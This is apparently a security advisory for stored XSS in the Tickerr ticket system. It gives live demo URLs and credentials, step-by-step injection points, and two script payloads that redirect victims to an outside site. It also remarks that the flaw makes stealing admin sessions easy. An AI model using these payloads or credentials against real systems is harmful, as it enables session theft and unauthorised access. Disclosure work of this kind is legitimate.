Tickerr - Ticket System v1.3 Stored XSS Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1598186 漏洞类型
发布时间 2019-05-07 更新时间 2019-05-07
漏洞平台 N/A CVSS评分 N/A
[*] :: Title: Tickerr - Ticket System v1.3 Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-05-07
[*] :: Software: Tickerr - Ticket System v1.3
[?] :: Technical Details & Description:
# Weak security measures like bad input fields data filtering has been discovered in the «Tickerr - Ticket System». Current version of this web-application is 1.3.

[?] :: Demo Website:
# https://codecanyon.net/item/tickerr-ticket-system/12818390
# Frontend: http://sglancer.com/Tickerr/guest/new-ticket
# Frontend: http://sglancer.com/Tickerr/guest/new-bug-report
# Backend: http://sglancer.com/Tickerr/
# Login/Password (admin): Admin/123456
# Login/Password (agent): Agent/123456
# Login/Password (client1): Client1/123456
# Login/Password (client2): Client2/123456

[!] :: Special Note:
# 260 Sales
# Unauthenticated Stored XSS Injections are more interesting because you can interact with admin panel («Bugs», «Tickets» and panel main screen sections).

[!] :: For developers:
# Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients.

[+] :: PoC [Links]:
# http://sglancer.com/Tickerr/panel/admin/free-bugs
# http://sglancer.com/Tickerr/panel/admin/all-bugs
# http://sglancer.com/Tickerr/panel/my-bugs
# http://sglancer.com/Tickerr/panel/bug/pAeJ9GbuwO
# http://sglancer.com/Tickerr/bug/98wM06PG7j/
# http://sglancer.com/Tickerr/ticket/ujq2izfeWz/

[+] :: PoC [Authenticated Stored XSS Injections]:
# Go to the demo website http://sglancer.com/Tickerr and log in as admin/agent. Go to the «Bugs» or «Tickets» section, create or edit any existed report/ticket and use «Subject» field for payload injection.
# Sample payload: "><script>alert('YOUR FLESH IS AN INSULT TO THE PERFECTION OF THE DIGITAL. - QUIXSS');location='https://twitter.com/quixss';</script>

[+] :: PoC [Unauthenticated Stored XSS Injections]:
# Go to the demo website and press the «Create ticket as guest» or «Leave bug report as guest» button, then you'll see new page with simple form where fields «YOUR NAME» and «SUBJECT*» are vulnerable for XSS Injections. Keep in mind that submitted reports/tickets are reflected inside admin panel, so it's really easy to steal the admin session f.e.
# Sample payload: "><script>alert('QUIXSS');location='https://twitter.com/quixss';</script>